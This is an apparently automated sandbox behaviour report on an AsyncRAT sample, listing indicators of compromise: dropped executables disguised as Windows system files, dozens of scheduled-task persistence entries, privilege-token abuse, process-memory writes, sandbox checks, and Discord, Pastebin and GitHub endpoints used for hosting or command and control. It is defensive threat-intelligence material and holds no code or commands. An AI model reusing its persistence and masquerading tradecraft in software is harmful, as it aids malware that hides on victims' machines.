asyncrat | hxxps://github[.]com/Sindoes/App-webhook-Cracker

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
5068	webhostdll.exe
2528	jusched.exe

Loads dropped DLL 58 IoCs

pid	Process
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe
4332	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs

Web Service

T1102

flow	ioc
81	raw.githubusercontent.com
82	pastebin.com
99	raw.githubusercontent.com
131	discord.com
135	discord.com
144	discord.com
146	discord.com
151	discord.com
162	discord.com
129	discord.com
134	discord.com
98	discord.com
138	discord.com
153	discord.com
157	discord.com
164	discord.com
76	discord.com
133	discord.com
150	discord.com
160	discord.com
130	discord.com
152	discord.com
156	discord.com
158	discord.com
161	discord.com
159	discord.com
77	discord.com
80	raw.githubusercontent.com
83	pastebin.com
117	discord.com
126	discord.com
145	discord.com
148	discord.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
88	api.ipify.org
112	ip-api.com
122	ipapi.co
123	ipapi.co
140	ipapi.co
87	api.ipify.org

Drops file in System32 directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSEW	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\IdleI	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\explorere	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OfficeClickToRunO	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\sihosts	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\sihost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\conhostc	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\conhost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\explorer	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\csrssc	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\csrss	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Idle	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\webhostdllw	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OfficeClickToRun	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSE	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RuntimeBrokerR	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RuntimeBroker	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\MoUsoCoreWorker	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\webhostdll	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhostd	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\jusched	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\MoUsoCoreWorkerM	svchost.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
5176	tasklist.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1236 set thread context of 908	1236	powershell.EXE	123

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023e10-2184.dat	upx
behavioral1/memory/4332-2194-0x00007FFA106C0000-0x00007FFA10B2E000-memory.dmp	upx
behavioral1/files/0x0007000000023e05-2222.dat	upx
behavioral1/files/0x0007000000023ded-2216.dat	upx
behavioral1/files/0x0007000000023e13-2237.dat	upx
behavioral1/files/0x0007000000023df5-2235.dat	upx
behavioral1/memory/4332-2273-0x00007FFA12500000-0x00007FFA125BC000-memory.dmp	upx
behavioral1/memory/4332-2272-0x00007FFA125C0000-0x00007FFA125ED000-memory.dmp	upx
behavioral1/memory/4332-2271-0x00007FFA23550000-0x00007FFA23569000-memory.dmp	upx
behavioral1/memory/4332-2270-0x00007FFA125F0000-0x00007FFA1261E000-memory.dmp	upx
behavioral1/files/0x0007000000023df4-2310.dat	upx
behavioral1/files/0x0007000000023e0e-2308.dat	upx
behavioral1/files/0x0007000000023e16-2306.dat	upx
behavioral1/files/0x0007000000023e11-2267.dat	upx
behavioral1/memory/4332-2315-0x00007FFA239D0000-0x00007FFA239DD000-memory.dmp	upx
behavioral1/memory/4332-2314-0x00007FFA12490000-0x00007FFA124C4000-memory.dmp	upx
behavioral1/memory/4332-2313-0x00007FFA124D0000-0x00007FFA124FB000-memory.dmp	upx
behavioral1/files/0x0007000000023df1-2263.dat	upx
behavioral1/files/0x0007000000023deb-2259.dat	upx
behavioral1/files/0x0007000000023e12-2245.dat	upx
behavioral1/memory/4332-2242-0x00007FFA23DD0000-0x00007FFA23DDD000-memory.dmp	upx
behavioral1/memory/4332-2241-0x00007FFA241C0000-0x00007FFA241D9000-memory.dmp	upx
behavioral1/memory/4332-2240-0x00007FFA242C0000-0x00007FFA242CF000-memory.dmp	upx
behavioral1/memory/4332-2239-0x00007FFA14970000-0x00007FFA14994000-memory.dmp	upx
behavioral1/memory/4332-2412-0x00007FFA123E0000-0x00007FFA12422000-memory.dmp	upx
behavioral1/memory/4332-2413-0x00007FFA1EFB0000-0x00007FFA1EFBA000-memory.dmp	upx
behavioral1/memory/4332-2414-0x00007FFA13960000-0x00007FFA1397C000-memory.dmp	upx
behavioral1/memory/4332-2416-0x00007FFA10EF0000-0x00007FFA10F1E000-memory.dmp	upx
behavioral1/memory/4332-2418-0x00007FFA0CA10000-0x00007FFA0CAC8000-memory.dmp	upx
behavioral1/memory/4332-2420-0x00007FFA0C690000-0x00007FFA0CA05000-memory.dmp	upx
behavioral1/memory/4332-2417-0x00007FFA14970000-0x00007FFA14994000-memory.dmp	upx
behavioral1/memory/4332-2415-0x00007FFA106C0000-0x00007FFA10B2E000-memory.dmp	upx
behavioral1/memory/4332-2436-0x00007FFA10EC0000-0x00007FFA10EE6000-memory.dmp	upx
behavioral1/memory/4332-2435-0x00007FFA1DD40000-0x00007FFA1DD4B000-memory.dmp	upx
behavioral1/memory/4332-2437-0x00007FFA0C570000-0x00007FFA0C688000-memory.dmp	upx
behavioral1/memory/4332-2434-0x00007FFA123C0000-0x00007FFA123D4000-memory.dmp	upx
behavioral1/memory/4332-2433-0x00007FFA12500000-0x00007FFA125BC000-memory.dmp	upx
behavioral1/memory/4332-2432-0x00007FFA125F0000-0x00007FFA1261E000-memory.dmp	upx
behavioral1/memory/4332-2438-0x00007FFA12110000-0x00007FFA1212F000-memory.dmp	upx
behavioral1/memory/4332-2439-0x00007FFA0BC60000-0x00007FFA0BDD1000-memory.dmp	upx
behavioral1/memory/4332-2455-0x00007FFA1A4D0000-0x00007FFA1A4DB000-memory.dmp	upx
behavioral1/memory/4332-2477-0x00007FFA106A0000-0x00007FFA106AD000-memory.dmp	upx
behavioral1/memory/4332-2486-0x00007FFA0D320000-0x00007FFA0D32B000-memory.dmp	upx
behavioral1/memory/4332-2488-0x00007FFA0C560000-0x00007FFA0C56D000-memory.dmp	upx
behavioral1/memory/4332-2502-0x00007FFA0C3C0000-0x00007FFA0C409000-memory.dmp	upx
behavioral1/memory/4332-2498-0x00007FFA0C410000-0x00007FFA0C429000-memory.dmp	upx
behavioral1/memory/4332-2497-0x00007FFA0C430000-0x00007FFA0C452000-memory.dmp	upx
behavioral1/memory/4332-2496-0x00007FFA0BC60000-0x00007FFA0BDD1000-memory.dmp	upx
behavioral1/memory/4332-2501-0x00007FFA0C270000-0x00007FFA0C28C000-memory.dmp	upx
behavioral1/memory/4332-2500-0x00007FFA0C3A0000-0x00007FFA0C3B1000-memory.dmp	upx
behavioral1/memory/4332-2499-0x00007FFA0C4C0000-0x00007FFA0C4D7000-memory.dmp	upx
behavioral1/memory/4332-2495-0x00007FFA0C4E0000-0x00007FFA0C4F4000-memory.dmp	upx
behavioral1/memory/4332-2494-0x00007FFA12110000-0x00007FFA1212F000-memory.dmp	upx
behavioral1/memory/4332-2493-0x00007FFA0C500000-0x00007FFA0C510000-memory.dmp	upx
behavioral1/memory/4332-2492-0x00007FFA0C570000-0x00007FFA0C688000-memory.dmp	upx
behavioral1/memory/4332-2491-0x00007FFA0C510000-0x00007FFA0C525000-memory.dmp	upx
behavioral1/memory/4332-2490-0x00007FFA0C530000-0x00007FFA0C53C000-memory.dmp	upx
behavioral1/memory/4332-2489-0x00007FFA0C540000-0x00007FFA0C552000-memory.dmp	upx
behavioral1/memory/4332-2487-0x00007FFA10EC0000-0x00007FFA10EE6000-memory.dmp	upx
behavioral1/memory/4332-2485-0x00007FFA0D300000-0x00007FFA0D30C000-memory.dmp	upx
behavioral1/memory/4332-2484-0x00007FFA0D310000-0x00007FFA0D31C000-memory.dmp	upx
behavioral1/memory/4332-2483-0x00007FFA0D3D0000-0x00007FFA0D3DB000-memory.dmp	upx
behavioral1/memory/4332-2482-0x00007FFA0C690000-0x00007FFA0CA05000-memory.dmp	upx
behavioral1/memory/4332-2481-0x00007FFA10690000-0x00007FFA1069E000-memory.dmp	upx

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe	webhostdll.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe	webhostdll.exe
File created	C:\Program Files\Common Files\DESIGNER\csrss.exe	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\RCX8782.tmp	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Windows Multimedia Platform\RCX89B5.tmp	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe	webhostdll.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\7a0fd90576e088	webhostdll.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\95d75016aa282d	webhostdll.exe
File created	C:\Program Files\MSBuild\Microsoft\dllhost.exe	webhostdll.exe
File created	C:\Program Files\Crashpad\reports\RuntimeBroker.exe	webhostdll.exe
File created	C:\Program Files\Common Files\DESIGNER\886983d96e3d3e	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Windows Multimedia Platform\RCX89B6.tmp	webhostdll.exe
File created	C:\Program Files\MSBuild\Microsoft\5940a34987c991	webhostdll.exe
File created	C:\Program Files\Crashpad\reports\9e8d7a4ca61bd9	webhostdll.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\RCX8781.tmp	webhostdll.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\servicing\Sessions\TiWorker.exe	webhostdll.exe
File created	C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe	webhostdll.exe
File opened for modification	C:\Windows\Migration\WTR\RCX8191.tmp	webhostdll.exe
File created	C:\Windows\TAPI\66fc9ff0ee96c2	webhostdll.exe
File opened for modification	C:\Windows\Migration\WTR\Idle.exe	webhostdll.exe
File created	C:\Windows\Migration\WTR\6ccacd8608530f	webhostdll.exe
File created	C:\Windows\TAPI\sihost.exe	webhostdll.exe
File created	C:\Windows\Performance\WinSAT\DataStore\9e8d7a4ca61bd9	webhostdll.exe
File opened for modification	C:\Windows\Migration\WTR\RCX81A2.tmp	webhostdll.exe
File created	C:\Windows\Migration\WTR\Idle.exe	webhostdll.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Xsploit Inject Fix.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1712	timeout.exe
5924	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	Xsploit Inject Fix.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 43 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4496	schtasks.exe
4208	schtasks.exe
2808	schtasks.exe
4368	schtasks.exe
1320	schtasks.exe
624	schtasks.exe
2632	schtasks.exe
3156	schtasks.exe
2456	schtasks.exe
3624	schtasks.exe
1716	schtasks.exe
1412	schtasks.exe
628	schtasks.exe
2808	schtasks.exe
3464	schtasks.exe
964	schtasks.exe
3856	schtasks.exe
1564	schtasks.exe
4264	schtasks.exe
5032	schtasks.exe
4208	schtasks.exe
316	schtasks.exe
64	schtasks.exe
2528	schtasks.exe
4448	schtasks.exe
2456	schtasks.exe
2632	schtasks.exe
1844	schtasks.exe
2604	schtasks.exe
2080	schtasks.exe
3624	schtasks.exe
6592	schtasks.exe
5676	schtasks.exe
2184	schtasks.exe
3344	schtasks.exe
6488	schtasks.exe
320	schtasks.exe
1432	schtasks.exe
1432	schtasks.exe
3948	schtasks.exe
3332	schtasks.exe
4500	schtasks.exe
4656	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2952	msedge.exe
2952	msedge.exe
3120	msedge.exe
3120	msedge.exe
3096	identity_helper.exe
3096	identity_helper.exe
1972	msedge.exe
1972	msedge.exe
1236	powershell.EXE
1236	powershell.EXE
1236	powershell.EXE
1236	powershell.EXE
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
908	dllhost.exe
908	dllhost.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe
4724	$77XD.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3144	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	908	dllhost.exe
Token: SeDebugPrivilege	4724	$77XD.exe
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeDebugPrivilege	5068	webhostdll.exe
Token: SeDebugPrivilege	5104	svchost.exe
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeDebugPrivilege	4332	main.exe
Token: SeDebugPrivilege	3288	JOKER.exe
Token: SeDebugPrivilege	2528	jusched.exe
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeShutdownPrivilege	3144	Explorer.EXE
Token: SeCreatePagefilePrivilege	3144	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	1756	svchost.exe
Token: SeIncreaseQuotaPrivilege	1756	svchost.exe
Token: SeSecurityPrivilege	1756	svchost.exe
Token: SeTakeOwnershipPrivilege	1756	svchost.exe
Token: SeLoadDriverPrivilege	1756	svchost.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
2256	Conhost.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
4100	Install.exe
3144	Explorer.EXE
3144	Explorer.EXE
3144	Explorer.EXE
3144	Explorer.EXE
3624	Install.exe
3144	Explorer.EXE
3144	Explorer.EXE
2528	jusched.exe
4188	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3120 wrote to memory of 212	3120	msedge.exe	84
PID 3120 wrote to memory of 212	3120	msedge.exe	84
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
